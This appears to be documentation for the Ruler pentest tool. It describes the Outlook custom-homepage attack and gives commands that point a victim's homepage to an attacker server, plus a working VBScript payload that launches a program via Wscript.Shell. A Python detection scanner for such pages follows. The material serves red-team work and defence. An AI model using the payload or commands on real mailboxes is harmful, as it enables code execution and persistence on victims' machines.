Ruler can get a shell through custom homepages. This is especially useful for persistence, as a homepage can lie dormant in the inbox, nearly undetectable.
The lowdown on the homepage attack is explained in the Outlook Home Page blog post.
To access the HomePage option, you need to use the homepage command. There are multiple sub-commands to homepage:
You can view the current homepage value using the display command. This will display the current URL and whether it is active or not.
./ruler --email email@example.com homepage display
Setting a new homepage couldn't be simpler. Use Ruler to set the new homepage to your exploit URL:
./ruler --email firstname.lastname@example.org homepage add --url "http://yourserver/pew.html"
The homepage attack requires your custom homepage to contain the "exploit". A basic version of this is:
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Outlook</title>
<script id=clientEventHandlersVBS language=vbscript>
<!--
 Sub window_onload()
     Set Application = ViewCtl1.OutlookApplication
     Set cmd = Application.CreateObject("Wscript.Shell")
     cmd.Run("notepad")
 End Sub
-->
</script>
</head>
<body>
 <object classid="clsid:0006F063-0000-0000-C000-000000000046" id="ViewCtl1" data="" width="100%" height="100%"></object>
</body>
</html>
Deleting an existing homepage is done in a similar way to deleting rules.
./ruler --email email@example.com homepage delete
Microsoft patched this attack by preventing the Homepage from being set remotely. Ben Wilson found that you can still use the homepage for persistence if you have access to the host. He documented this in an excellent blog post: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
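On the detection side, the basic homepage shown above has a recognisable static shape: it embeds the Outlook View Control by CLSID and scripts against its OutlookApplication object. The following is an added example, not part of Ruler or the original page, that checks an HTML document for those markers; the function names, indicator names and both sample documents are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# CLSID of the Outlook View Control, taken from the homepage shown above.
VIEW_CONTROL_CLSID = "clsid:0006f063-0000-0000-c000-000000000046"

class HomepageScanner(HTMLParser):
    """Collects the <object> and <script> features the homepage relies on."""
    def __init__(self):
        super().__init__()
        self.findings, self.script, self.in_script = set(), [], False
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "").strip().lower() for k, v in attrs}
        if tag == "object" and a.get("classid") == VIEW_CONTROL_CLSID:
            self.findings.add("outlook-view-control")
        elif tag == "script":
            self.in_script = True
            if "vbscript" in a.get("language", "") + a.get("type", ""):
                self.findings.add("vbscript-block")
    def handle_endtag(self, tag):
        self.in_script = self.in_script and tag != "script"
    def handle_data(self, data):
        if self.in_script:
            self.script.append(data)
    handle_comment = handle_data  # script bodies are often wrapped in <!-- -->

def scan_homepage(html_text):
    """Return the sorted indicator names found in one HTML document."""
    s = HomepageScanner()
    s.feed(html_text)
    s.close()
    body = "\n".join(s.script)
    if re.search(r"\.\s*OutlookApplication\b", body, re.I):
        s.findings.add("outlookapplication-access")
    if re.search(r"\bCreateObject\s*\(", body, re.I):
        s.findings.add("createobject-call")
    return sorted(s.findings)

def is_suspicious(findings):
    """Flag pages that embed the view control and script against its application object."""
    return {"outlook-view-control", "outlookapplication-access"} <= set(findings)

# Constructed samples: one mirrors the structure of the homepage above, one is benign.
SAMPLE_PAYLOAD = (
    '<script language=vbscript><!--\n'
    'Set app = ViewCtl1.OutlookApplication\n'
    'Set sh = app.CreateObject("Wscript.Shell")\n--></script>'
    '<object classid="clsid:0006F063-0000-0000-C000-000000000046" id="ViewCtl1"></object>')
SAMPLE_BENIGN = "<h1>Team news</h1><script>var a = 1;</script>"
```

The scanner only reads the HTML it is given, so it fits wherever such pages can be captured, for example a web proxy or a file retrieved from a host during triage.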